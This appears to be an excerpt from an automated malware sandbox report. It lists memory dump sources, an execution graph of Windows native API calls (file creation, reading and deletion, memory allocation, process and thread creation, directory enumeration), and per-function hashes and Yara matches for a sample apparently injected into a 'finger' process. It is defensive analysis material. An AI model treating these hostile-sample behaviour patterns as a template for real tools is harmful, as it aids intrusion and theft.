                                                                                                                                      Download Yara Rule
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2285918657.0000000000F90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_f90000_QmBbqpEHu0.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: $$@
                                                                                                                                      • API String ID: 0-1194432280
                                                                                                                                      • Opcode ID: 6f7802770f05c40b1f8bb79d49e287d5d3b4dc1a3112272311e7d0b145a08ed0
                                                                                                                                      • Instruction ID: 0cc0b27ac5471dc73205b24114511404568a09655431129280b83c5f8ba6190f
                                                                                                                                      • Opcode Fuzzy Hash: 6f7802770f05c40b1f8bb79d49e287d5d3b4dc1a3112272311e7d0b145a08ed0
                                                                                                                                      • Instruction Fuzzy Hash: E7812C72D002799BDB35CB94CD49BEEB7B4AB08710F0441EAEA49B7280D7755E84DFA0

                                                                                                                                      Execution Graph

                                                                                                                                      Execution Coverage:2.6%
                                                                                                                                      Dynamic/Decrypted Code Coverage:4.1%
                                                                                                                                      Signature Coverage:2.2%
                                                                                                                                      Total number of Nodes:465
                                                                                                                                      Total number of Limit Nodes:77
                                                                                                                                      execution_graph 96476 9b2b1a 96477 9b2b48 96476->96477 96480 9b66a0 96477->96480 96479 9b2b53 96481 9b66d3 96480->96481 96482 9b66f7 96481->96482 96487 9c9460 96481->96487 96482->96479 96484 9b671a 96484->96482 96491 9c98f0 96484->96491 96486 9b679a 96486->96479 96488 9c947a 96487->96488 96494 3522ca0 LdrInitializeThunk 96488->96494 96489 9c94a6 96489->96484 96492 9c990d 96491->96492 96493 9c991e NtClose 96492->96493 96493->96486 96494->96489 96495 3522ad0 LdrInitializeThunk 96496 9b2650 96501 9c8f40 96496->96501 96500 9b269b 96502 9c8f5d 96501->96502 96510 3522c0a 96502->96510 96503 9b2686 96505 9c9990 96503->96505 96506 9c9a1f 96505->96506 96507 9c99bb 96505->96507 96513 3522e80 LdrInitializeThunk 96506->96513 96507->96500 96508 9c9a50 96508->96500 96511 3522c11 96510->96511 96512 3522c1f LdrInitializeThunk 96510->96512 96511->96503 96512->96503 96513->96508 96514 9b5f90 96519 9b84e0 96514->96519 96516 9b5fc0 96518 9b5fec 96516->96518 96523 9b8460 96516->96523 96520 9b84f3 96519->96520 96530 9c8e40 96520->96530 96522 9b851e 96522->96516 96524 9b84a4 96523->96524 96529 9b84c5 96524->96529 96536 9c8c10 96524->96536 96526 9b84b5 96527 9b84d1 96526->96527 96528 9c98f0 NtClose 96526->96528 96527->96516 96528->96529 96529->96516 96531 9c8ebe 96530->96531 96533 9c8e6b 96530->96533 96535 3522dd0 LdrInitializeThunk 96531->96535 96532 9c8ee3 96532->96522 96533->96522 96535->96532 96537 9c8c90 96536->96537 96538 9c8c3e 96536->96538 96541 3524650 LdrInitializeThunk 96537->96541 96538->96526 96539 9c8cb5 96539->96526 96541->96539 96542 9b7510 96543 9b752c 96542->96543 96551 9b757f 96542->96551 96545 9c98f0 NtClose 96543->96545 96543->96551 96544 9b76b7 96546 9b7547 96545->96546 96552 9b6930 NtClose LdrInitializeThunk LdrInitializeThunk 96546->96552 96548 9b7691 96548->96544 96554 9b6b00 NtClose LdrInitializeThunk LdrInitializeThunk 96548->96554 96551->96544 96553 9b6930 NtClose LdrInitializeThunk LdrInitializeThunk 96551->96553 96552->96551 96553->96548 96554->96544 96555 9ccad0 96558 9cb9d0 96555->96558 96561 9c9c70 96558->96561 96560 9cb9e9 96562 9c9c8a 96561->96562 96563 9c9c9b RtlFreeHeap 96562->96563 96563->96560 96569 9c9850 96570 9c98c7 96569->96570 96572 9c987b 96569->96572 96571 9c98dd NtDeleteFile 96570->96571 96578 9c1b90 96579 9c1bac 96578->96579 96580 9c1be8 96579->96580 96581 9c1bd4 96579->96581 96582 9c98f0 NtClose 96580->96582 96583 9c98f0 NtClose 96581->96583 96584 9c1bf1 96582->96584 96585 9c1bdd 96583->96585 96588 9cbaf0 RtlAllocateHeap 96584->96588 96587 9c1bfc 96588->96587 96589 9ab8c0 96592 9cb940 96589->96592 96591 9acf31 96595 9c9a60 96592->96595 96594 9cb971 96594->96591 96596 9c9af5 96595->96596 96598 9c9a8b 96595->96598 96597 9c9b0b NtAllocateVirtualMemory 96596->96597 96597->96594 96598->96594 96599 9a9e40 96601 9a9e96 96599->96601 96600 9aa68a 96601->96600 96603 9cb630 96601->96603 96604 9cb656 96603->96604 96609 9a4090 96604->96609 96606 9cb662 96608 9cb69b 96606->96608 96612 9c5a40 96606->96612 96608->96600 96616 9b35c0 96609->96616 96611 9a409d 96611->96606 96613 9c5aa2 96612->96613 96615 9c5aaf 96613->96615 96627 9b1d90 96613->96627 96615->96608 96617 9b35dd 96616->96617 96619 9b35f6 96617->96619 96620 9ca370 96617->96620 96619->96611 96622 9ca38a 96620->96622 96621 9ca3b9 96621->96619 96622->96621 96623 9c8f40 LdrInitializeThunk 96622->96623 96624 9ca419 96623->96624 96625 9cb9d0 RtlFreeHeap 96624->96625 96626 9ca432 96625->96626 96626->96619 96628 9b1dcb 96627->96628 96643 9b8270 96628->96643 96630 9b1dd3 96631 9b20b0 96630->96631 96654 9cbab0 96630->96654 96631->96615 96633 9b1de9 96634 9cbab0 RtlAllocateHeap 96633->96634 96635 9b1dfa 96634->96635 96636 9cbab0 RtlAllocateHeap 96635->96636 96637 9b1e0b 96636->96637 96642 9b1ea2 96637->96642 96665 9b6e00 NtClose LdrInitializeThunk LdrInitializeThunk LdrInitializeThunk 96637->96665 96640 9b2062 96661 9c8380 96640->96661 96657 9b4920 96642->96657 96644 9b829c 96643->96644 96666 9b8160 96644->96666 96647 9b82c9 96649 9b82d4 96647->96649 96651 9c98f0 NtClose 96647->96651 96648 9b82e1 96650 9b82fd 96648->96650 96652 9c98f0 NtClose 96648->96652 96649->96630 96650->96630 96651->96649 96653 9b82f3 96652->96653 96653->96630 96677 9c9c20 96654->96677 96656 9cbacb 96656->96633 96658 9b4944 96657->96658 96659 9b4980 LdrLoadDll 96658->96659 96660 9b494b 96658->96660 96659->96660 96660->96640 96662 9c83e2 96661->96662 96664 9c83ef 96662->96664 96680 9b20c0 96662->96680 96664->96631 96665->96642 96667 9b8256 96666->96667 96668 9b817a 96666->96668 96667->96647 96667->96648 96672 9c8fe0 96668->96672 96671 9c98f0 NtClose 96671->96667 96673 9c8ffa 96672->96673 96676 35235c0 LdrInitializeThunk 96673->96676 96674 9b824a 96674->96671 96676->96674 96678 9c9c3a 96677->96678 96679 9c9c4b RtlAllocateHeap 96678->96679 96679->96656 96696 9b8540 96680->96696 96682 9b20e0 96690 9b2632 96682->96690 96700 9c1560 96682->96700 96685 9b22f7 96708 9ccba0 96685->96708 96686 9b213e 96686->96690 96703 9cca70 96686->96703 96688 9b2359 96689 9b84e0 LdrInitializeThunk 96688->96689 96688->96690 96693 9b0c00 LdrInitializeThunk 96688->96693 96689->96688 96690->96664 96691 9b230c 96691->96688 96714 9b0c00 96691->96714 96693->96688 96694 9b24b0 96694->96688 96695 9b84e0 LdrInitializeThunk 96694->96695 96695->96694 96697 9b854d 96696->96697 96698 9b856e SetErrorMode 96697->96698 96699 9b8575 96697->96699 96698->96699 96699->96682 96701 9cb940 NtAllocateVirtualMemory 96700->96701 96702 9c1581 96701->96702 96702->96686 96704 9cca86 96703->96704 96705 9cca80 96703->96705 96706 9cbab0 RtlAllocateHeap 96704->96706 96705->96685 96707 9ccaac 96706->96707 96707->96685 96709 9ccb10 96708->96709 96710 9ccb6d 96709->96710 96711 9cbab0 RtlAllocateHeap 96709->96711 96710->96691 96712 9ccb4a 96711->96712 96713 9cb9d0 RtlFreeHeap 96712->96713 96713->96710 96715 9b0c1c 96714->96715 96718 9c9b80 96715->96718 96719 9c9b9d 96718->96719 96722 3522c70 LdrInitializeThunk 96719->96722 96720 9b0c22 96720->96694 96722->96720 96723 9bfc40 96724 9bfca4 96723->96724 96725 9b66a0 2 API calls 96724->96725 96726 9bfdd7 96725->96726 96727 9bfdde 96726->96727 96752 9b67b0 96726->96752 96729 9bff83 96730 9bfe5a 96730->96729 96731 9bff92 96730->96731 96756 9bfa20 96730->96756 96732 9c98f0 NtClose 96731->96732 96734 9bff9c 96732->96734 96735 9bfe96 96735->96731 96736 9bfea1 96735->96736 96737 9cbab0 RtlAllocateHeap 96736->96737 96738 9bfeca 96737->96738 96739 9bfee9 96738->96739 96740 9bfed3 96738->96740 96765 9bf910 CoInitialize 96739->96765 96741 9c98f0 NtClose 96740->96741 96744 9bfedd 96741->96744 96743 9bfef7 96768 9c93b0 96743->96768 96746 9bff72 96747 9c98f0 NtClose 96746->96747 96748 9bff7c 96747->96748 96749 9cb9d0 RtlFreeHeap 96748->96749 96749->96729 96750 9bff15 96750->96746 96751 9c93b0 LdrInitializeThunk 96750->96751 96751->96750 96753 9b67d5 96752->96753 96772 9c9260 96753->96772 96757 9bfa3c 96756->96757 96758 9b4920 LdrLoadDll 96757->96758 96760 9bfa5a 96758->96760 96759 9bfa63 96759->96735 96760->96759 96761 9b4920 LdrLoadDll 96760->96761 96762 9bfb2e 96761->96762 96763 9b4920 LdrLoadDll 96762->96763 96764 9bfb8b 96762->96764 96763->96764 96764->96735 96767 9bf975 96765->96767 96766 9bfa0b CoUninitialize 96766->96743 96767->96766 96769 9c93cd 96768->96769 96777 3522ba0 LdrInitializeThunk 96769->96777 96770 9c93fd 96770->96750 96773 9c927d 96772->96773 96776 3522c60 LdrInitializeThunk 96773->96776 96774 9b6849 96774->96730 96776->96774 96777->96770 96783 9c0540 96784 9c0563 96783->96784 96785 9b4920 LdrLoadDll 96784->96785 96786 9c0587 96785->96786 96788 9b34b3 96789 9b8160 2 API calls 96788->96789 96790 9b34c3 96789->96790 96791 9b34df 96790->96791 96792 9c98f0 NtClose 96790->96792 96792->96791 96793 9b9ff3 96794 9b9fff 96793->96794 96795 9cb9d0 RtlFreeHeap 96794->96795 96796 9ba006 96794->96796 96795->96796 96797 9b76f0 96798 9b7708 96797->96798 96800 9b7762 96797->96800 96798->96800 96801 9bb660 96798->96801 96802 9bb686 96801->96802 96803 9bb8b9 96802->96803 96828 9c9d00 96802->96828 96803->96800 96805 9bb6fc 96805->96803 96806 9ccba0 2 API calls 96805->96806 96807 9bb71b 96806->96807 96807->96803 96808 9bb7f2 96807->96808 96809 9c8f40 LdrInitializeThunk 96807->96809 96810 9bb811 96808->96810 96812 9b5f10 LdrInitializeThunk 96808->96812 96811 9bb77d 96809->96811 96827 9bb8a1 96810->96827 96835 9c8ab0 96810->96835 96811->96808 96813 9bb786 96811->96813 96812->96810 96813->96803 96815 9bb7b8 96813->96815 96821 9bb7da 96813->96821 96831 9b5f10 96813->96831 96814 9b84e0 LdrInitializeThunk 96817 9bb7e8 96814->96817 96850 9c4bc0 LdrInitializeThunk 96815->96850 96817->96800 96820 9b84e0 LdrInitializeThunk 96823 9bb8af 96820->96823 96821->96814 96822 9bb878 96840 9c8b60 96822->96840 96823->96800 96825 9bb892 96845 9c8cc0 96825->96845 96827->96820 96829 9c9d1a 96828->96829 96830 9c9d2b CreateProcessInternalW 96829->96830 96830->96805 96832 9b5f16 96831->96832 96851 9c9110 96832->96851 96834 9b5f4e 96834->96815 96836 9c8b30 96835->96836 96837 9c8ade 96835->96837 96857 35239b0 LdrInitializeThunk 96836->96857 96837->96822 96838 9c8b55 96838->96822 96841 9c8be0 96840->96841 96843 9c8b8e 96840->96843 96858 3524340 LdrInitializeThunk 96841->96858 96842 9c8c05 96842->96825 96843->96825 96846 9c8d3d 96845->96846 96847 9c8ceb 96845->96847 96859 3522fb0 LdrInitializeThunk 96846->96859 96847->96827 96848 9c8d62 96848->96827 96850->96821 96852 9c91c4 96851->96852 96854 9c9142 96851->96854 96856 3522d10 LdrInitializeThunk 96852->96856 96853 9c9209 96853->96834 96854->96834 96856->96853 96857->96838 96858->96842 96859->96848 96860 9bffb0 96863 9c78e0 96860->96863 96862 9bffcf 96864 9c7945 96863->96864 96865 9c7974 96864->96865 96868 9bdd50 96864->96868 96865->96862 96867 9c7956 96867->96862 96869 9bdd4e 96868->96869 96871 9bdcc0 96868->96871 96869->96867 96870 9bdd3c 96870->96867 96871->96870 96873 9c5290 96871->96873 96874 9c52f5 96873->96874 96875 9c532c 96874->96875 96878 9b87a0 96874->96878 96875->96871 96877 9c530e 96877->96871 96879 9b8793 96878->96879 96879->96878 96880 9b8740 96879->96880 96882 9b7490 96879->96882 96880->96877 96883 9b74a6 96882->96883 96885 9b74df 96882->96885 96883->96885 96886 9b7300 LdrLoadDll 96883->96886 96885->96879 96886->96885 96887 9b7170 96888 9b719a 96887->96888 96891 9b8310 96888->96891 96890 9b71c4 96892 9b832d 96891->96892 96898 9c9030 96892->96898 96894 9b837d 96895 9b8384 96894->96895 96896 9c9110 LdrInitializeThunk 96894->96896 96895->96890 96897 9b83ad 96896->96897 96897->96890 96899 9c90cb 96898->96899 96900 9c905b 96898->96900 96903 3522f30 LdrInitializeThunk 96899->96903 96900->96894 96901 9c9104 96901->96894 96903->96901 96904 9b1170 96905 9b1173 96904->96905 96906 9b4920 LdrLoadDll 96905->96906 96907 9b11a8 96906->96907 96908 9b11e1 PostThreadMessageW 96907->96908 96909 9b11ed 96907->96909 96908->96909 96910 9c64b0 96911 9c650a 96910->96911 96913 9c6517 96911->96913 96914 9c3eb0 96911->96914 96915 9cb940 NtAllocateVirtualMemory 96914->96915 96916 9c3ef1 96915->96916 96917 9b4920 LdrLoadDll 96916->96917 96919 9c3ffe 96916->96919 96920 9c3f37 96917->96920 96918 9c3f80 Sleep 96918->96920 96919->96913 96920->96918 96920->96919 96921 9c8ef0 96922 9c8f0d 96921->96922 96925 3522df0 LdrInitializeThunk 96922->96925 96923 9c8f35 96925->96923 96926 9c95f0 96927 9c96a7 96926->96927 96929 9c961f 96926->96929 96928 9c96bd NtCreateFile 96927->96928 96930 9c8d70 96931 9c8e02 96930->96931 96933 9c8d9e 96930->96933 96935 3522ee0 LdrInitializeThunk 96931->96935 96932 9c8e33 96935->96932 96938 9a9de0 96939 9a9def 96938->96939 96940 9a9e30 96939->96940 96941 9a9e1d CreateThread 96939->96941 96942 9bc9e0 96944 9bca09 96942->96944 96943 9bcb0d 96944->96943 96945 9bcab3 FindFirstFileW 96944->96945 96945->96943 96946 9bcace 96945->96946 96947 9bcaf4 FindNextFileW 96946->96947 96947->96946 96948 9bcb06 FindClose 96947->96948 96948->96943 96949 9bb120 96954 9bae30 96949->96954 96951 9bb12d 96970 9baab0 96951->96970 96953 9bb149 96955 9bae55 96954->96955 96982 9b8750 96955->96982 96958 9bafa3 96958->96951 96960 9bafba 96960->96951 96961 9c5290 LdrLoadDll 96962 9bafb1 96961->96962 96962->96960 96962->96961 96965 9bb0a7 96962->96965 97001 9ba500 96962->97001 96964 9c5290 LdrLoadDll 96964->96965 96965->96964 96966 9bb10a 96965->96966 97010 9ba870 96965->97010 96968 9cb9d0 RtlFreeHeap 96966->96968 96969 9bb111 96968->96969 96969->96951 96971 9baac6 96970->96971 96979 9baad1 96970->96979 96972 9cbab0 RtlAllocateHeap 96971->96972 96972->96979 96973 9baaf2 96973->96953 96974 9b8750 GetFileAttributesW 96974->96979 96975 9bae02 96976 9bae1b 96975->96976 96977 9cb9d0 RtlFreeHeap 96975->96977 96976->96953 96977->96976 96978 9c5290 LdrLoadDll 96978->96979 96979->96973 96979->96974 96979->96975 96979->96978 96980 9ba500 RtlFreeHeap 96979->96980 96981 9ba870 RtlFreeHeap 96979->96981 96980->96979 96981->96979 96983 9b8771 96982->96983 96984 9b8778 GetFileAttributesW 96983->96984 96985 9b8783 96983->96985 96984->96985 96985->96958 96986 9c3770 96985->96986 96987 9c377e 96986->96987 96988 9c3785 96986->96988 96987->96962 96989 9b4920 LdrLoadDll 96988->96989 96990 9c37ba 96989->96990 96991 9c37c9 96990->96991 97014 9c3230 LdrLoadDll 96990->97014 96993 9cbab0 RtlAllocateHeap 96991->96993 96997 9c3977 96991->96997 96994 9c37e2 96993->96994 96995 9c396d 96994->96995 96994->96997 96998 9c37fe 96994->96998 96996 9cb9d0 RtlFreeHeap 96995->96996 96995->96997 96996->96997 96997->96962 96998->96997 96999 9cb9d0 RtlFreeHeap 96998->96999 97000 9c3961 96999->97000 97000->96962 97002 9ba526 97001->97002 97015 9bdf50 97002->97015 97004 9ba598 97006 9ba720 97004->97006 97007 9ba5b6 97004->97007 97005 9ba705 97005->96962 97006->97005 97008 9ba3c0 RtlFreeHeap 97006->97008 97007->97005 97020 9ba3c0 97007->97020 97008->97006 97011 9ba896 97010->97011 97012 9bdf50 RtlFreeHeap 97011->97012 97013 9ba91d 97012->97013 97013->96965 97014->96991 97017 9bdf74 97015->97017 97016 9bdf81 97016->97004 97017->97016 97018 9cb9d0 RtlFreeHeap 97017->97018 97019 9bdfc4 97018->97019 97019->97004 97021 9ba3dd 97020->97021 97024 9bdfe0 97021->97024 97023 9ba4e3 97023->97007 97025 9be004 97024->97025 97026 9be0ae 97025->97026 97027 9cb9d0 RtlFreeHeap 97025->97027 97026->97023 97027->97026 97028 9c1f20 97033 9c1f39 97028->97033 97029 9c1fc6 97030 9c1f81 97031 9cb9d0 RtlFreeHeap 97030->97031 97032 9c1f91 97031->97032 97033->97029 97033->97030 97034 9c1fc1 97033->97034 97035 9cb9d0 RtlFreeHeap 97034->97035 97035->97029 97036 9c1721 97037 9c1731 97036->97037 97049 9c9760 97037->97049 97039 9c1742 97040 9c1775 97039->97040 97041 9c1760 97039->97041 97043 9c98f0 NtClose 97040->97043 97042 9c98f0 NtClose 97041->97042 97044 9c1769 97042->97044 97046 9c177e 97043->97046 97045 9c17b5 97046->97045 97047 9cb9d0 RtlFreeHeap 97046->97047 97048 9c17a9 97047->97048 97050 9c9807 97049->97050 97052 9c978b 97049->97052 97051 9c981d NtReadFile 97050->97051 97051->97039 97052->97039

                                                                                                                                      Executed Functions

                                                                                                                                      Function 009A9E40 Relevance: 55.4, Strings: 44, Instructions: 423COMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 27 9a9e40-9aa284 29 9aa28b-9aa297 27->29 30 9aa299-9aa2ba 29->30 31 9aa2bc-9aa2c6 29->31 30->29 32 9aa2d7-9aa2e0 31->32 33 9aa2e2-9aa2f4 32->33 34 9aa2f6-9aa300 32->34 33->32 35 9aa311-9aa31a 34->35 37 9aa31c-9aa328 35->37 38 9aa344 35->38 39 9aa32a-9aa32e 37->39 40 9aa32f-9aa331 37->40 41 9aa34b-9aa364 38->41 39->40 42 9aa342 40->42 43 9aa333-9aa33c 40->43 41->41 44 9aa366-9aa377 41->44 42->35 43->42 46 9aa388-9aa394 44->46 47 9aa396-9aa3a5 46->47 48 9aa3a7-9aa3b1 46->48 47->46 49 9aa3c2-9aa3ce 48->49 51 9aa3df-9aa3f0 49->51 52 9aa3d0-9aa3dd 49->52 53 9aa401-9aa40d 51->53 52->49 55 9aa40f-9aa422 53->55 56 9aa424-9aa42e 53->56 55->53 57 9aa43f-9aa448 56->57 59 9aa44a-9aa459 57->59 60 9aa45b-9aa464 57->60 59->57 61 9aa46a-9aa474 60->61 62 9aa59d-9aa5a7 60->62 65 9aa485-9aa48e 61->65 64 9aa5b8-9aa5c4 62->64 68 9aa5db-9aa5e2 64->68 69 9aa5c6-9aa5d9 64->69 66 9aa49b-9aa4b3 65->66 67 9aa490-9aa499 65->67 72 9aa4f2-9aa4fc 66->72 73 9aa4b5-9aa4bc 66->73 67->65 74 9aa5e8-9aa5ef 68->74 75 9aa70c-9aa716 68->75 69->64 80 9aa50d-9aa519 72->80 76 9aa4be-9aa4eb 73->76 77 9aa4ed 73->77 78 9aa5f1-9aa624 74->78 79 9aa626-9aa630 74->79 81 9aa727-9aa733 75->81 76->73 77->62 78->74 82 9aa641-9aa64d 79->82 83 9aa51b-9aa52d 80->83 84 9aa52f-9aa53b 80->84 85 9aa74b-9aa752 81->85 86 9aa735-9aa73e 81->86 87 9aa64f-9aa65b 82->87 88 9aa65d-9aa664 82->88 83->80 90 9aa53d-9aa55e 84->90 91 9aa560-9aa566 84->91 94 9aa77c-9aa786 85->94 95 9aa754-9aa766 85->95 92 9aa749 86->92 93 9aa740-9aa746 86->93 87->82 98 9aa666-9aa683 88->98 99 9aa685 call 9cb630 88->99 90->84 101 9aa56a-9aa571 91->101 92->81 93->92 96 9aa768-9aa76c 95->96 97 9aa76d-9aa76f 95->97 96->97 103 9aa77a 97->103 104 9aa771-9aa777 97->104 98->88 108 9aa68a-9aa694 99->108 106 9aa598 101->106 107 9aa573-9aa596 101->107 103->85 104->103 106->60 107->101 109 9aa6a5-9aa6b1 108->109 110 9aa6b3-9aa6c5 109->110 111 9aa6c7-9aa6d1 109->111 110->109 112 9aa6e2-9aa6ee 111->112 112->75 114 9aa6f0-9aa6fc 112->114 115 9aa70a 114->115 116 9aa6fe-9aa704 114->116 115->112 116->115
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000A.00000002.3586429800.00000000009A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 009A0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_10_2_9a0000_finger.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: !$!$$X$($,$.>$01$4$5\$8$8`$:$;?$<$=J$@$@=$B$D$E$FY$H$R$W$X$Z$]$] $_$b$b'$bJ$d$n[$wG$x^$yQ${$~$!$*$<$B$d
                                                                                                                                      • API String ID: 0-4228383014
                                                                                                                                      • Opcode ID: 45a2061ccf458dbdb3e9497b7190e0eed4afdd8156428e0b2063d0dcd1594317
                                                                                                                                      • Instruction ID: b5f8204a16e1299d5ffb3f3b48c77b3834b68ccd2389ccb413388d8f4db7c015
                                                                                                                                      • Opcode Fuzzy Hash: 45a2061ccf458dbdb3e9497b7190e0eed4afdd8156428e0b2063d0dcd1594317
                                                                                                                                      • Instruction Fuzzy Hash: CF32AFB0D05628CBEB64CF44C9987DDBBB1BB56308F1085D9D1896B280CBB95EC9CF85
                                                                                                                                      Function 009BC9E0 Relevance: 4.6, APIs: 3, Instructions: 106fileCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • FindFirstFileW.KERNELBASE(?,00000000), ref: 009BCAC4
                                                                                                                                      • FindNextFileW.KERNELBASE(?,00000010), ref: 009BCAFF
                                                                                                                                      • FindClose.KERNELBASE(?), ref: 009BCB0A
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000A.00000002.3586429800.00000000009A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 009A0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_10_2_9a0000_finger.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Find$File$CloseFirstNext
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3541575487-0
                                                                                                                                      • Opcode ID: 9f520c8eb43a31d38e7f5d8b0d0826a3e8044e161c1e792f69fe4c7a71f6a48c
                                                                                                                                      • Instruction ID: f80fdd97f92f7aa780e80e2a80dd66571c52d58a94ebe0e2c2563d6c077e68ee
                                                                                                                                      • Opcode Fuzzy Hash: 9f520c8eb43a31d38e7f5d8b0d0826a3e8044e161c1e792f69fe4c7a71f6a48c
                                                                                                                                      • Instruction Fuzzy Hash: 4831A6B5A4030CBBDB20DB64CD86FEF77BCAF84714F104459B909A7191DA70AE84CBA1
                                                                                                                                      Function 009C95F0 Relevance: 1.6, APIs: 1, Instructions: 101filenativeCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • NtCreateFile.NTDLL(?,?,?,?,?,97C467A0,?,?,?,?,?), ref: 009C96EE
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000A.00000002.3586429800.00000000009A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 009A0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_10_2_9a0000_finger.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID: CreateFile
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 823142352-0
                                                                                                                                      • Opcode ID: 3b72953985565114540f5d9b9afaf6d0dd9883191b30b95bf7fb6a1fe9d2f644
                                                                                                                                      • Instruction ID: 7cf62c14c3c64938e784c9fb58661ff6bd822d9959eb862db0a9bbbb58db6383
                                                                                                                                      • Opcode Fuzzy Hash: 3b72953985565114540f5d9b9afaf6d0dd9883191b30b95bf7fb6a1fe9d2f644
                                                                                                                                      • Instruction Fuzzy Hash: F331D4B5A00248AFCB14DF98C881EEEB7F9EF8D314F108209F919A7340D770A911CBA5
                                                                                                                                      Function 009C9760 Relevance: 1.6, APIs: 1, Instructions: 93filenativeCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • NtReadFile.NTDLL(?,?,?,?,?,97C467A0,?,?,?), ref: 009C9846
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000A.00000002.3586429800.00000000009A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 009A0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_10_2_9a0000_finger.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID: FileRead
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2738559852-0
                                                                                                                                      • Opcode ID: 02ef30ed1401b686cca2db6043f8bb476b0ffa679f0082c7a04b14c15aa9692e
                                                                                                                                      • Instruction ID: 2dc619c2a0f5ae11a5be18e77e664320ae8088bc1e71f80946401720c7d1532d
                                                                                                                                      • Opcode Fuzzy Hash: 02ef30ed1401b686cca2db6043f8bb476b0ffa679f0082c7a04b14c15aa9692e
                                                                                                                                      • Instruction Fuzzy Hash: 6631E8B5A00248AFDB14DF98C881EDFBBF9EF8D314F108109F908A7240D770A911CBA5
                                                                                                                                      Function 009C9A60 Relevance: 1.6, APIs: 1, Instructions: 81memorynativeCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • NtAllocateVirtualMemory.NTDLL(009B213E,?,009C83EF,00000000,00000004,97C467A0,?,?,?,?,?,009C83EF,009B213E), ref: 009C9B28
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000A.00000002.3586429800.00000000009A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 009A0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_10_2_9a0000_finger.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID: AllocateMemoryVirtual
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2167126740-0
                                                                                                                                      • Opcode ID: 36eb2fd49f8f4dd0a814e016e2559ca72dd9badcf1e4fd20b6b9986feb012b3a
                                                                                                                                      • Instruction ID: 8e731374466084f0702f66a89823a6ce987acdbb72ec74709352cbd397042edf
                                                                                                                                      • Opcode Fuzzy Hash: 36eb2fd49f8f4dd0a814e016e2559ca72dd9badcf1e4fd20b6b9986feb012b3a
                                                                                                                                      • Instruction Fuzzy Hash: CC21F9B5A00348AFDB14DF98DC81FAF77B9EB89710F008109F919A7240D770A911CBA6
                                                                                                                                      Function 009C9850 Relevance: 1.6, APIs: 1, Instructions: 61filenativeCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000A.00000002.3586429800.00000000009A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 009A0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_10_2_9a0000_finger.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID: DeleteFile
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 4033686569-0
                                                                                                                                      • Opcode ID: 74e00cd2e70aced1ae344fc8a020418b5d94312c0693c0340a3b2fccb8910217
                                                                                                                                      • Instruction ID: 4ea4fd41104062b952e9224b438f6f6cca92981166ed2e49d745229db690261f
                                                                                                                                      • Opcode Fuzzy Hash: 74e00cd2e70aced1ae344fc8a020418b5d94312c0693c0340a3b2fccb8910217
                                                                                                                                      • Instruction Fuzzy Hash: 69112175A00708BED620EB59CC42FAB77ACEF86714F108549F948A7281D7746905C7A6
                                                                                                                                      Function 009C98F0 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • NtClose.NTDLL(?,?,001F0001,?,00000000,?,00000000,00000104), ref: 009C9927
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000A.00000002.3586429800.00000000009A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 009A0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_10_2_9a0000_finger.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Close
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3535843008-0
